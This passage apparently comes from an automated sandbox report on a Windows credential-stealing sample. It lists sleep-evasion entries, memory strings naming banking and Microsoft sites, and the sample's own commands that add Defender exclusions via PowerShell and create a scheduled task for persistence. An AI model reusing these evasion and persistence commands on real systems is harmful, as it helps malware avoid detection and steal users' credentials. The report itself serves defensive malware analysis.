                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598563s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598438s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -598094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -597110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -595110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594599s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594235s >= -30000s
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284Thread sleep time: -594110s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599651Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599204Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598968Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598749Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598630Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598280Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598137Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597882Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597756Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597529Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597395Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 597046Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596171Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 596059Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595296Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 595076Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594968Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594749Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594640Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594421Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeThread delayed: delay time: 594312Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599764
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599656
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599547
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599438
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599108
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 599000
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598891
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598671
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598563
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598438
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598313
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598203
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597969
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594599
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594469
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeThread delayed: delay time: 594110
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: agAuJ8ltVMCIOf31qe
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Moh2uvNIhrMD87MeqTp499ojZ0uClGYarOWia3sDc6iIE5DoMgLhVnnV4DjUcygVBEuQl90cDX7pFgpsJijK6E6rHdONN5sODtAjIwDWtTGULZRMUE2Fj3XlcXb5N2UserControlSystem.Windows.Formsk3ZUjPa20Tik3jWV8kUITypeEditorSystem.Drawing.DesignSystem.DrawingNJvaftViZCrUawpPyDEnumfpTmbbA6mAHt3E4m7BhJDpVO7OkQKoukAkBDpJJpnbhNcqddPKB5GiW44NXrf2yC2IF9gssmMulticastDelegateh9IuwMLhwtWcBrgArvgWUdPE570duXOaTosPEw9kjYCckUlpsppOHDgiasUyystTG2A7WhKuRE4XX3uTiS5NWWiKliXxNhj0X9rYlaF5gNDMBiugBnBZWCFt7Ewm7wSm5vt4mfwLQW1GI9s3hcuTYXSqkwomMdsga5LAygLLTlJ3waMWnrOvesbnfMW4Mk2s0ycjObETNeRQMKXH8pIIdEjtwWuVkvn7B22TncsV9RIUS8PfJt4bUhXxOd3JjV2oSH3kSysCLngEqqtaN0cyeiCZwLqjAHTjNgmOKSFEu9yQIJsu7xPACCkMYGXppgoU3EMeNe348PbvtbyE6bKq8ssfWKvVRqcaYHgBoAcUagAuJ8ltVMCIOf31qeHB1KvCqepuAVmDoRkkosTPLD8geo6nK93sMtFQNciltNv6xTBg4mDnOa6Ics9ceFiUpsBSSNAwnTP8xASXn1LS9TElsykO9GUdcQc3uv1Gl6B9NspD0y77ytoQ73NUw9IHQIwKLhGAYielhDmc80r04br1raHZc02RTYXrCGo1jlbktWdEYCtA0wcJIu0fB0vDCBxQyPiPDkgXSNDJXOEU9uOU7hj56Il9kD8GGFs8EventArgsBFLkBEkukybo5Lqdv6ApplicationExceptionlOo23tKDyq8RMS9L0OcxeQw3G2l0Hu03P5VQLxCNonv9tgb7MgycvMrfnvmQEjkFlNZNo6Jlk2poIMQ64WqeCK4xGtfdTT72dOQV85E4pPehWQ8e1ROmWKFr3U75t8R5769LjfVZiEvqo41dFormVayqvEHaUQbcd8xW2dzv9XvurHRAfCNDMw3OTWVDqCskDMqZf5rRyjRandomu3dyRKzJYCE1BncR3WdG6YnBZ1m4opc2QNnBXExpandableObjectConverterSystem.ComponentModelcy90LWZZANC1R9g8UDHkIkj41ZNKTT1FjngbaZQsKlaUZiwJH928fJXh0mLUTdMZc5QsC1kdrm6l<Module>{F24F8E17-F53B-40E1-8D30-F436263EAB53}MkFTk1Zp1VPy5rmC0B4E4aJIoZDOaTiOqr6NBwdwWkfZZVLh8jcYt44mw<PrivateImplementationDetails>{2D7C28CA-46B4-49DC-B5F4-8C0A3073B189}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3724508809.000000000126F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldp
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: ckHregxJIq.exe, 0000000E.00000002.3724848711.0000000001346000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeMemory written: C:\Users\user\Desktop\ckHregxJIq.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Users\user\Desktop\ckHregxJIq.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
